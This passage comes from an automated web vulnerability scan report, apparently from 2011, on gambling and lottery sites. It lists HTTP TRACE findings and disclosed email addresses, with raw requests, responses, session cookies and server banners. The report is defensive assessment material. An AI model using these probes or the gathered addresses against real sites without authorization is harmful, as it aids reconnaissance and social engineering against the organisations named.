Date: Mon, 16 May 2011 12:45:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.opensource.org
Cookie: 87ff0c14b8055ebf

20.18. http://www.postcodelottery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.postcodelottery.com
Cookie: d9306f7a9dc91

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8h DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.postcodelottery.com
Cookie: d9306f7a9dc91

20.19. https://www.postcodelottery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.postcodelottery.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.postcodelottery.com
Cookie: c5cb8855e66ac46e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8h DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.postcodelottery.com
Cookie: c5cb8855e66ac46e

20.20. http://www.quirksmode.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.quirksmode.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.quirksmode.org
Cookie: 9e47897ed15c6d2b

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:11:02 GMT
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.7d
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9e47897ed15c6d2b
Host: www.quirksmode.org

20.21. http://www.tstglobal.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tstglobal.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.tstglobal.com
Cookie: 7400a7f0dd155449

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:05 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tstglobal.com
Cookie: 7400a7f0dd155449

21. Email addresses disclosed previous next
There are 73 instances of this issue:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://members.bet365.com/members/chat/
http://neogames-tech.com/careers
http://neogames-tech.com/contact-us
http://neogames-tech.com/corporate
http://primescratchcards.com/images/HelpDepositMethods.asp
http://primescratchcards.com/images/InviteFriend.asp
http://primescratchcards.com/images/Responsible.asp
http://primescratchcards.com/images/SecurityAndPrivacy.asp
http://primescratchcards.com/images/aboutus.asp
http://primescratchcards.com/images/affiliates.asp
http://primescratchcards.com/images/bg.jpg
http://primescratchcards.com/images/contactus.asp
http://primescratchcards.com/images/fairplay.asp
http://primescratchcards.com/images/help.asp
http://primescratchcards.com/images/index.asp
http://primescratchcards.com/images/media.asp
http://primescratchcards.com/images/playersclub.asp
http://primescratchcards.com/images/promotions.asp
http://primescratchcards.com/images/terms.asp
http://primescratchcards.com/images/underage.asp
http://scratch.co.uk/about/
http://scratch.co.uk/contact/
http://scratch.co.uk/help/
http://scratch.co.uk/help/privacy/
http://scratch.co.uk/problem-gambling/
http://scratch.co.uk/vis-club/
http://trk.primescratchcards.com/w3c/p3p.xml
http://widgets.twimg.com/j/2/widget.css
http://widgets.twimg.com/j/2/widget.js
http://www.bet365.com/home/js/FlashDetection_vA009cr.js
http://www.bet365.com/home/js/Navigation_vA081cr.js
https://www.betsson.com/en/customer-service/
https://www.betsson.com/en/customer-service/responsible-gaming/
https://www.betsson.com/en/customer-service/terms/index.asp
http://www.bigmoneyscratch.com/Affiliates.aspx
http://www.gamblersanonymous.org/
http://www.gx4.com/
http://www.huddletogether.com/projects/lightbox2/
http://www.lga.org.mt/lga/content.aspx
http://www.lga.org.mt/lga/home.aspx
http://www.neogames.com/careers
http://www.neogames.com/contact-us
http://www.neogames.com/corporate
http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group
https://www.norskelodd.com/no/FAQ
https://www.norskelodd.com/no/charity/
http://www.opensource.org/licenses/mit-license.php
http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm
http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm
http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
http://www.primegrattage.com/
http://www.primescratchcards.com/
http://www.primescratchcards.com/HelpDepositMethods.asp
http://www.primescratchcards.com/InviteFriend.asp
http://www.primescratchcards.com/Responsible.asp
http://www.primescratchcards.com/SecurityAndPrivacy.asp
http://www.primescratchcards.com/aboutus.asp
http://www.primescratchcards.com/affiliates.asp
http://www.primescratchcards.com/contactus.asp
http://www.primescratchcards.com/fairplay.asp
http://www.primescratchcards.com/help.asp
http://www.primescratchcards.com/index.asp
http://www.primescratchcards.com/media.asp
http://www.primescratchcards.com/playersclub.asp
http://www.primescratchcards.com/promotions.asp
http://www.primescratchcards.com/terms.asp
http://www.primescratchcards.com/underage.asp
http://www.primescratchcards.com.br/
http://www.svenskalotter.com/Affiliates.aspx
http://www.svenskalotter.com/Charity.aspx
http://www.verisign.co.uk/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

21.1. https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ble.hs.llnwd.net
Path:	/e1/betsson/en/df_CoreJsRoot_v105046.js

Issue detail

The following email address was disclosed in the response:

andreas.eberhard@gmail.com

Request

GET /e1/betsson/en/df_CoreJsRoot_v105046.js HTTP/1.1
Host: ble.hs.llnwd.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 16 May 2011 12:00:11 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: max-age=86400
Accept-Ranges: bytes
ETag: "992f95aec3e7cb1:0"
X-Powered-By: ASP.NET
Age: 1720
Last-Modified: Mon, 21 Mar 2011 12:29:54 GMT
Expires: Tue, 17 May 2011 11:31:30 GMT
Content-Length: 218783

...String.Format=function(format){for(var i=1,j=arguments.length;i<j;i++){var exp=new RegExp("\\{"+(i-1)+"\\}","gm");format=format.replace(exp,arguments[i])}return format};String.Empty="";String.IsNul
...[SNIP]...
ur")})}})(jQuery);
var $j=jQuery.noConflict();/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*/
(function($)
{

...[SNIP]...

21.2. https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ble.hs.llnwd.net
Path:	/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js

Issue detail

The following email address was disclosed in the response:

andrej.okonetschnikow@gmail.com

Request

GET /e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js HTTP/1.1
Host: ble.hs.llnwd.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 16 May 2011 12:00:07 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: max-age=86400
Accept-Ranges: bytes
ETag: "2027ac25260cc1:0"
X-Powered-By: ASP.NET
Last-Modified: Thu, 21 Apr 2011 13:15:12 GMT
Expires: Tue, 17 May 2011 12:00:06 GMT
Content-Length: 230271

...var jsChatLink = 'http://customer.service.ehosts.net/netagent/cimlogin.aspx?questid=8CB80F4B-955F-4313-9106-7BF7009A6932&portid=B7CED77E-FA6D-4943-AE01-005BF189F266&nareferer={referrer}';
var jsCh
...[SNIP]...
;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject

/*
ModalBox - The pop-up window thingie with AJAX, based on prototype and script.aculo.us.

Copyright Andrey Okonetchnikov (andrej.okonetschnikow@gmail.com), 2006-2007
All rights reserved.

VERSION 1.5.4
Last Modified: 07/16/2007
*/
if(!window.Modalbox){var Modalbox=new Object()}Modalbox.Methods={options:{title:"ModalBox Window",overlayClose:true,
...[SNIP]...

21.3. https://members.bet365.com/members/chat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://members.bet365.com
Path:	/members/chat/

Issue detail

The following email address was disclosed in the response:

support@customerservices365.com

Request

GET /members/chat/ HTTP/1.1
Host: members.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.4. http://neogames-tech.com/careers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://neogames-tech.com
Path:	/careers

Issue detail

The following email addresses were disclosed in the response:

jobs@neogames.com
recruitment@neogames.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:jobs@neogames.com">recruitment@neogames.com</a>
...[SNIP]...

21.5. http://neogames-tech.com/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://neogames-tech.com
Path:	/contact-us

Issue detail

The following email addresses were disclosed in the response:

info@neogames.com
recruitment@neogames.com
sales@neogames.com
support@neogames.com

Request

Response

HTTP/1.1 200 OK
Content-Length: 7505
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:39:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:sales@neogames.com">sales@neogames.com</a>
...[SNIP]...
<a href="mailto:support@neogames.com">support@neogames.com</a>
...[SNIP]...
<a href="mailto:recruitment@neogames.com">recruitment@neogames.com</a>
...[SNIP]...
<a href="mailto:info@neogames.com">info@neogames.com</a>
...[SNIP]...

21.6. http://neogames-tech.com/corporate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://neogames-tech.com
Path:	/corporate

Issue detail

The following email address was disclosed in the response:

sales@neogames.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:sales@neogames.com">sales@neogames.com</a>
...[SNIP]...

21.7. http://primescratchcards.com/images/HelpDepositMethods.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/HelpDepositMethods.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

21.8. http://primescratchcards.com/images/InviteFriend.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/InviteFriend.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

21.9. http://primescratchcards.com/images/Responsible.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/Responsible.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.10. http://primescratchcards.com/images/SecurityAndPrivacy.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/SecurityAndPrivacy.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.11. http://primescratchcards.com/images/aboutus.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/aboutus.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

21.12. http://primescratchcards.com/images/affiliates.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/affiliates.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.13. http://primescratchcards.com/images/bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/bg.jpg

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

Response

21.14. http://primescratchcards.com/images/contactus.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/contactus.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.15. http://primescratchcards.com/images/fairplay.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/fairplay.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

21.16. http://primescratchcards.com/images/help.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/help.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.17. http://primescratchcards.com/images/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/index.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

21.18. http://primescratchcards.com/images/media.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/media.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.19. http://primescratchcards.com/images/playersclub.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/playersclub.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

21.20. http://primescratchcards.com/images/promotions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/promotions.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

21.21. http://primescratchcards.com/images/terms.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/terms.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.22. http://primescratchcards.com/images/underage.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/underage.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

21.23. http://scratch.co.uk/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/about/

Issue detail

The following email address was disclosed in the response:

support@scratch.co.uk

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

21.24. http://scratch.co.uk/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/contact/

Issue detail

The following email address was disclosed in the response:

support@scratch.co.uk

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

21.25. http://scratch.co.uk/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/

Issue detail

The following email address was disclosed in the response:

support@scratch.co.uk

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
